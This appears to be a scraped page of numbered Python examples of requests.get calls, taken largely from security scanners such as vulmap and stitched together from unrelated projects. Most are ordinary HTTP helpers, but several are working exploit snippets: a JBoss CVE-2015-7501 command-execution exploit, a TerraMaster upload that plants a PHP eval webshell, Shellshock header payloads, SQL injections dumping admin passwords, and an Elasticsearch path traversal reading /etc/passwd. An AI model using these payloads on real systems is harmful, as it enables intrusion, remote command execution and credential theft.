     self.vul_info["cre_auth"] = "zhzyker"
     try:
         request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False)
         if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text:
             self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Example 22
    def _matchRequests(self, fp):
        if not self._cmsEnhance:
            return ['requests', None, None]
        matchs = []
        for line in fp:
            uri = self._metaInfo['target'].baseURL.rstrip("/") + line
            try:
                self._log.debug("matchRequests get {0}".format(uri))
                response = http.get(uri, allow_redirects=False)
            except http.ConnectionError:
                continue
            else:
                if response.status_code == 200:
                    if self._notFoundPattern:
                        if self._notFoundPattern in response.content:
                            continue
                        else:
                            self._log.debug("matchRequests got >>> {0}".format(uri))
                            matchs.append(uri)
                    else:
                        self._log.debug("matchRequests got >>> {0}".format(uri))
                        matchs.append(uri)
                else:
                    continue

        if len(matchs) == len(fp):
            return ['requests', str(matchs), None]
        else:
            return ['requests', None, None]
Example 23
    def cve_2015_7501_exp(self, cmd):
        vul_name = "RedHat JBoss: CVE-2015-7501"
        self.path = "/invoker/JMXInvokerServlet"
        self.headers = {
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            'User-Agent': self.ua,
            "Connection": "close"
        }
        try:
            self.req = requests.post(self.url + self.path,
                                     data=self.payload_cve_2015_7501,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
            time.sleep(0.5)
            self.cmd = urlencode({"ppp": cmd})
            self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" +
                                        self.cmd,
                                        headers=self.headers,
                                        timeout=self.timeout,
                                        verify=False)

            r = self.url + "/jexinv4/jexinv4.jsp?" + self.cmd
            r += "\n"
            r += self.request.text
            self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
            verify.exploit_print(r, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)
Example 24
def version_check():
    n = random.choice(range(10))
    if n <= 1:
        version = globals.get_value("VULMAP")  # fetch the global VULMAP version number
        timeout = globals.get_value("TIMEOUT")  # fetch the global TIMEOUT
        headers = globals.get_value("HEADERS")  # fetch the global HEADERS
        github_ver_url = "https://github.com/zhzyker/vulmap/blob/main/version"
        now_warn = now.timed(de=0) + color.red_warn()
        try:
            github_ver_request = requests.get(url=github_ver_url,
                                              headers=headers,
                                              timeout=timeout)
            version_res = r'blob-code blob-code-inner js-file-line">(.*)</td>'
            github_ver = re.findall(version_res, github_ver_request.text,
                                    re.S | re.M)[0]
            if version == github_ver:
                print(
                    now.timed(de=0) + color.yel_info() +
                    color.yellow(" Currently the latest version: " + version))
            elif version < github_ver:
                print(now_warn +
                      color.red(" The current version is: " + version +
                                ", Latest version: " + github_ver))
                print(now_warn + color.red(
                    " Go to github https://github.com/zhzyker/vulmap update"))
            else:
                print(now_warn +
                      color.red(" Internal beta version: " + version))
        except requests.exceptions.ConnectionError:
            print(now_warn + color.red(" The current version is: " + version +
                                       ", Version check failed"))
        except requests.exceptions.Timeout:
            print(now_warn + color.red(" The current version is: " + version +
                                       ", Version check failed"))
Example 25
 def getshell(self, url):
     '''
     TerraMaster file-upload getshell helper
     :param url:  base URL of the TerraMaster instance
     :return:     URL of the uploaded webshell
     '''
     exp_url = url + 'include/upload.php?targetDir=../cgi-bin/filemanage/'
     headers = {
         'User-Agent':
         'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
     }
     filename = 'safe.php'
     with open(filename, 'wb') as fp:
         fp.write(b'<?php @eval($_POST[mosin]);?>')
     files = {
         'Filename': (None, filename),
         'name': (None, filename),
         'chunk': (None, '0'),
         'chunks': (None, '1'),
         'file': (filename, open(filename,
                                 'rb'), 'application/octet-stream'),
         'Upload': (None, '给老子上!')
     }
     try:
         requests.post(exp_url, files=files, headers=headers)
         shell = url + 'cgi-bin/filemanage/' + filename
         reqcode = requests.get(shell, headers=headers).status_code
         if reqcode == 200:
             return shell
     except Exception as msg:
         print('\n[x] ERROR!!!:', msg)
Example 26
def crawl(url, currentDepth, countUrls):

    redisCon = Redis(host=conf.REDIS_HOST,
                      port=conf.REDIS_PORT,
                      password=conf.REDIS_PASSWD)

    try:
        headers = dict()
        headers[HTTP_HEADER.USER_AGENT] = randomUserAgents()

        response = requests.get(url, timeout=10, headers=headers)
        # crawlMsg = 'crawled %s depth: %d count: %d' % (url, currentDepth, countVisitedUrls)
        # logger.log(CUSTOM_LOGGING.SYSINFO, crawlMsg)
        content = response.text

        kb.pageEncoding = response.encoding
        conf.cookie = str(response.cookies.get_dict())
        hashData = hashUrl(url)
        redisCon.sadd('visited', hashData)
        redisCon.lpush('visitedList', url)
        getDB().insert({'url':url, 'depth': currentDepth, 'count':countUrls})

    except Exception as ex:
        logger.log(CUSTOM_LOGGING.ERROR, ex)
        # print traceback.print_exc()
        return
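The hashUrl helper used by Examples 12 and 26 is not shown; a minimal sketch, assuming a stable MD5 fingerprint of the URL used as the deduplication key:

import hashlib

def hashUrl(url):
    # Assumed behavior: stable fingerprint stored in the "visited" set
    # so the same URL is never crawled twice.
    return hashlib.md5(url.encode("utf-8")).hexdigest()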
Example 27
 def dnslog_cn():
     headers_dnslog = {
         'User-Agent':
         'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
         'Host': 'www.dnslog.cn',
         'Cookie':
         'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
         'Accept': '*/*',
         'Referer': 'http://www.dnslog.cn/',
         'Accept-Language': 'zh-CN,zh;q=0.9',
         'Connection': 'close'
     }
     dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
     d_p = globals.get_value("DNS_DNSLOG_HOST")
     timeout = globals.get_value("TIMEOUT")  # fetch the global TIMEOUT (assumed, mirroring the other helpers)
     try:
         if d_p is None:
             dns = requests.get(dnslog_api,
                                headers=headers_dnslog,
                                timeout=timeout,
                                verify=False)
             dns_host = random_md5() + "." + dns.text
             globals.set_value("DNS_DNSLOG_HOST", dns.text)
             return dns_host
         else:
             dns_host = random_md5() + "." + globals.get_value(
                 "DNS_DNSLOG_HOST")
             return dns_host
     except Exception:
         return "error"
Example 28
    def _search(self, params):
        '''
        Request with specified param, parse the response html document.
        @params:
            params: the query params
        @returns:
            return the search result, result format is:
                [[title, url, brief-information], [...] ...]
        '''
        for i in range(self.retry):
            # use a delay and a random user-agent to bypass IP-restriction policies
            delayTime = random.randint(1, 3)
            time.sleep(delayTime)

            userAgent = random.choice(self.userAgents)
            xforward = "192.168.3." + str(random.randint(1, 255))

            headers = {"User-Agent":userAgent, "X-Forward-For":xforward, "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"}
            try:
                response = http.get(self.url, headers=headers, params=params)
            except http.RequestException as error:
                continue
            
            # If findSignature is not found, the search engine's IP-restriction policy was
            # probably triggered, so retry; if it is found, there is no need to retry.
            if self.findSignature in response.text:
                for item in self._parseHtml(response.text):
                    yield item
                break
            elif self.notFindSignature in response.text:
                return
        else:
            return
Example 29
    def _checkPath(self, path, pattern):
        url = self.baseURL + path
        try:
            #response = http.get(url)
            response = http.get(url, allow_redirects=False)
        except http.ConnectionError as error:
            self.log.debug("Checking '{0}' failed, connection failed".format(url))
            return False

        if response.status_code == 200:
            if self.notFoundPattern:
                if self.notFoundPattern in response.content:
                    self.log.debug("Checking '{0}' failed, notFoundPattern matchs.".format(url))
                    return False
                #if response.history:
                #    if self.notFoundPattern in response.history[0].content:
                #        self.log.debug("Checking '{0}' failed, notFoundPattern matchs.".format(url))
                #        return False
            if not pattern:
                self.log.debug("Checking '{0}' success, status code 200.".format(url))
                return True
            else:
                if pattern in response.text:
                    self.log.debug("Checking '{0}' success, status code 200, match pattern {1}.".format(url,pattern))
                    return True
                else:
                    self.log.debug("Checking '{0}' failed, pattern not found.".format(url))
                    return False
        else:
            self.log.debug("Checking '{0}' failed, status code {1}".format(url, response.status_code))
            return False
Example 30
 def _response_for(self, path):
     uri = "/".join([self._base_uri, path])
     response = requests.get(uri, headers=self._headers)
     if response.status_code == 200:
         body = self._handle_success(response, uri)
         return body
     else:
         self._handle_error(response, uri)
Example 31
 def _http_conn(url):
     try:
         timeout = globals.get_value("TIMEOUT")  # fetch the global TIMEOUT
         headers = globals.get_value("HEADERS")
         target = url_check(url)
         requests.get(target,
                      timeout=timeout,
                      headers=headers,
                      verify=False)
         return "s"
     except requests.exceptions.ConnectionError:
         return "f"
     except requests.exceptions.Timeout:
         return "f"
     # add by https://github.com/zhzyker/vulmap/issues/30 @zilong3033 fix url extract
     except requests.exceptions.InvalidURL:
         return "f"
Example 32
    def verify(self):
        re_pattern = re.compile(r'~~~(.*?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_headers = {'user-agent': r'''() { :; }; echo; echo ~~~`id`~~~'''}

        try:
            response = requests.get(self.option.url, headers=exp_headers, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return
Example 34
 def get_page_size(self, url):
     try:
         req = requests.get(url, timeout=self.timeout)
         # sometimes the content-length header is missing
         page_size = int(req.headers["content-length"]) if "content-length" in req.headers else len(req.content)
         return page_size
     except Exception as e:
         log.output_log("[error] " + str(e), True)
         return 0
Example 35
 def confirm_sucess(self):
     try:
         req = requests.get(self.API_URL)
         d = req.json()
         name = d['data'][0]['name']
         if self.BANNER in name:
             return True
     except Exception:
         return False
     return False
Example 36
 def sendRequest(self, cookies="", agent=""):
     User_Agent = agent if agent != "" else "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
     header = {"User-Agent": User_Agent, "Cookie": cookies}
     for url in self.UrlList:
         res = requests.get(url, headers=header)
         if res.status_code != 404:
             self.table.append(url)
     return str(self.table)
Example 37
 def get_page_size(self, url):
     try:
         req = requests.get(url, timeout=self.timeout)
         # sometimes the content-length header is missing
         page_size = int(req.headers["content-length"]) if "content-length" in req.headers else len(req.content)
         return page_size
     except Exception as e:
         log.output_log("".join(["[error] ", str(e)]), True)
         return 0
Example 39
 def get_server_info(self, url):
     server_info = {}
     try:
         req = requests.get(url, timeout=self.timeout)
         status_code, server_type, web_type = req.status_code, req.headers['server'], req.headers["x-powered-by"]
         server_info.setdefault("status_code", status_code)
         server_info.setdefault("server", server_type)
         server_info.setdefault("x-powered-by", web_type)
     except Exception as e:
         print(str(e))
     return server_info
Example 40
    def exploit(self):
        re_pattern = re.compile(r'~~~(.*?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_headers = {
            'user-agent': '() {{ :; }}; echo; echo ~~~`{command}`~~~'.format(command=self.option.cmd)
        }

        try:
            response = requests.get(self.option.url, headers=exp_headers, verify=False)
        except Exception, e:
            self.result.error = str(e)
            return
Example 41
    def _initMetaInfo(self):
        self._metaInfo['url'] = self._url
        self._metaInfo['target'] = self._target
        try:
            response = http.get(self._target.uri)
        except http.ConnectionError:
            raise PenError("Can not connect to {0}".format(self._target.uri))
        else:
            self._metaInfo['statusCode'] = response.status_code
            self._metaInfo['headers'] = response.headers
            self._metaInfo['html'] = response.content
            self._metaInfo['title'] = self._getTitle(response.content)

        self._metaInfo['robots'] = ""
        try:
            response = http.get(self._target.baseURL+"robots.txt")
        except http.ConnectionError:
            pass
        else:
            if response.status_code == 200:
                self._metaInfo['robots'] = response.content
Example 42
    def verify(self):
        self.print_debug("verify start")

        re_version_pattern = re.compile(r'~~~(.+?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        exp_url = ("{domain}/php/bill/list_userinfo.php?domain=fatezero.org&ok=1&cp=1 union "
                   "select concat(0x7e7e7e,@@version,0x7e7e7e),2,3,4,5%23".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return
Example 43
    def exploit(self):
        self.print_debug("exploit start")

        re_userinfo_pattern = re.compile(r'~~~(\w+?)\|\|\|(\w+?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        cookies = {'cookie': 'admin'}
        exp_url = ("{domain}/php/bill/list_userinfo.php?domain=fatezero.org&ok=1&cp=1 union select concat(0x7e7e7e,"
                   "oid,0x7c7c7c,password,0x7e7e7e),2,3,4,5 from admininfo%23".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return
Example 44
def http_request_get(url, body_content_workflow=0, stream=False):
    trycnt = 0

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36',
        'Referer': url,
        'X-CSRF-Token': 'gq+Gnl4JMKKOhALUqNUwZmVBQvEPr7GwB83R26v4SRo=',
        'Cookie': 'Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1445508519,1447835208; bdshare_firstime=1406012352921; __cfduid=d332bae9f4e8436979014dc2898aadb521427525951; PHPSESSID=grsutmbkjv942rgdvot3j8jd25; wy_uid=4a16IUdtWwwtFHCYfHaWUq1GsXLBZ7Nt7obf4Ww6q4Ry; wy_pwd=d437Bj2YxrEN8YXL7zLZ3%2FAwIHu00E1CdXktJy6K4421FwRmhRX%2BFVpqBDmgZ7jPV7RvIfZfodBrSEdYBA; wy_token=3dd1db3721a539c70e82f84e24407515; Hm_lpvt_c12f88b5c1cd041a732dea597a5ec94c=1447835243'}
    while True:
        try:
            if body_content_workflow == 1:
                result = requests.get(url, stream=True, headers=headers, timeout=timeout, proxies=proxies, verify=False)
                return result
            else:
                result = requests.get(url, headers=headers, timeout=timeout, proxies=proxies, verify=False)
                return result
        except Exception as e:
            # print 'Exception: %s' % e
            trycnt += 1
            if trycnt >= retry_cnt:
                # print 'retry overflow'
                return False
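The hand-rolled retry loop above can also be expressed with urllib3's Retry mounted on a requests.Session; a sketch of that alternative (the retry counts and status list are illustrative):

import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

def make_session(retries=3, backoff=0.5):
    # Session that transparently retries connection failures and selected
    # 5xx responses with exponential backoff between attempts.
    session = requests.Session()
    retry = Retry(total=retries, backoff_factor=backoff,
                  status_forcelist=[500, 502, 503, 504])
    adapter = HTTPAdapter(max_retries=retry)
    session.mount("http://", adapter)
    session.mount("https://", adapter)
    return session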
Example 45
    def check_site_dir(self, site_root):
        while True:
            test_dir = self.get_payload()
            if test_dir is None:
                break
            test_url = site_root + test_dir
            try:
                req = requests.get(test_url, headers=self.headers, cookies=None, timeout=3)
                status_code = req.status_code
                status = self.status_codes[str(status_code)][0] \
                    if str(status_code) in self.status_codes else "Undefined"
                self.result_dispose("[site_dir][%d][%s]%s" % (status_code, str(status), test_url))

            except Exception as e:
                log.output_log("[error] " + str(e), True)
Example 46
    def get_page_source(self, url, headers, cookies, times=0):
        if times < 3:
            try:
                req = requests.get(url, headers=headers, cookies=cookies, timeout=self.timeout)
                if req.status_code == 200:
                    html = req.text
                    req.close()
                    return html

                if req.status_code == 403:
                    times += 1
                    log.output_log("[error] 403, retrying connect %d" % times, True)
                    proxy_switch.link_proxy(self.proxy)
                    return self.get_page_source(url, headers, cookies, times)
                return None

            except Exception as e:
                log.output_log("".join(["[error] ", str(e)]), True)
                return None
Example 47
    def request(self, path):
        i = 0
        proxy = None
        result = None
        while i <= self.maxRetries:
            try:
                if self.proxy is not None:
                    proxy = {"https" : self.proxy, "http" : self.proxy}
                url = "{0}://{1}:{2}".format(self.protocol, self.host, self.port)
                url = urllib.parse.urljoin(url, self.basePath)

                # Joining with concatenation because a urljoin bug with "::"
                if not url.endswith('/'):
                    url += "/"
                if path.startswith('/'):
                    path = path[1:]
                    #print(path)
                url += path

                headers = dict(self.headers)
                if self.randomAgents is not None:
                    headers["User-agent"] = random.choice(self.randomAgents)
                #print(url)
                response = requests.get(url, proxies=proxy, verify=False, allow_redirects=self.redirect, \
                                        headers=headers, timeout=self.timeout)
                result = Response(response.status_code, response.reason, response.headers, response.content)
                del headers
                break
            except requests.exceptions.ConnectionError as e:
                if self.proxy is not None:
                    raise RequestException({'message': 'Error with the proxy: {0}'.format(e)})
                continue
            except (requests.exceptions.ReadTimeout, requests.exceptions.Timeout, http.client.IncompleteRead, \
                    socket.timeout):
                continue
            finally:
                i = i + 1
        if i > self.maxRetries:
            raise RequestException(\
                {'message': 'CONNECTION TIMEOUT: There was a problem in the request to: {0}'.format(path)}
                )
        return result
Example 48
 def verify(self):
     try:
         host = self.option.url
         PluginList = ['head','test','kopf', 'HQ', 'marvel', 'bigdesk']
         port = 9200
         fpath = '/etc/passwd'
         re_result_info=''
         try:
             for plugin in PluginList:
                 exp_url = ("{domain}:9200/_plugin/{plugin}/../../../../../../../../..{fpath}".format(domain=self.option.url,plugin=plugin,fpath=fpath))
                 response = requests.get(exp_url, timeout=15, verify=False)
                 if -1 != response.content.find(b"root"):
                     self.option.cmd = "root"
                     self.result.status = True
                     self.result.data.cmd_info.cmd = '/etc/passwd'
                     break
         except Exception as e:
             print("[-] Error connecting to %s:%s" % (host, e))
             sys.exit()
     except Exception as e:
         self.result.error = str(e)
         return
Example 49
    def bruteforce(self, baseURL, notFoundPattern=None, safeURL=None, timeout=10, delay=0):
        '''
        Brute force
        '''
        baseURL = URL.getURI(baseURL)

        keyword = self._getKeywordFromURL(baseURL)
        if keyword:
            self.keywords.append(keyword)

        matchs = []
        baseURL = baseURL.rstrip("/")
        for line in self._dictIter():
            time.sleep(delay)
            self._safeRequest(safeURL)

            url = baseURL.rstrip("/") + line
            try:
                self.log.debug(u"request url '{0}'".format(url))
                #response = http.get(url, timeout=timeout)
                response = http.get(url, timeout=timeout, allow_redirects=False)
            except http.ConnectionError:
                continue
            if response.status_code == 200:
                if notFoundPattern:
                    if notFoundPattern in response.content:
                        continue
                    #if response.history:
                    #    if notFoundPattern in response.history[0].content:
                    #        continue
                self.log.debug(u"find available url '{0}'".format(url))
                matchs.append(url)
            else:
                continue

        return matchs
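A usage sketch for the method above; the enclosing scanner object, its wordlist iterator _dictIter, and the target URL are all assumptions:

# Hypothetical usage: probe a target, treating pages that contain the
# "not found" marker as misses, pausing 0.5 s between requests.
matchs = scanner.bruteforce("http://example.com/app/",
                            notFoundPattern="Page Not Found",
                            safeURL=None, timeout=10, delay=0.5)
for url in matchs:
    print(url)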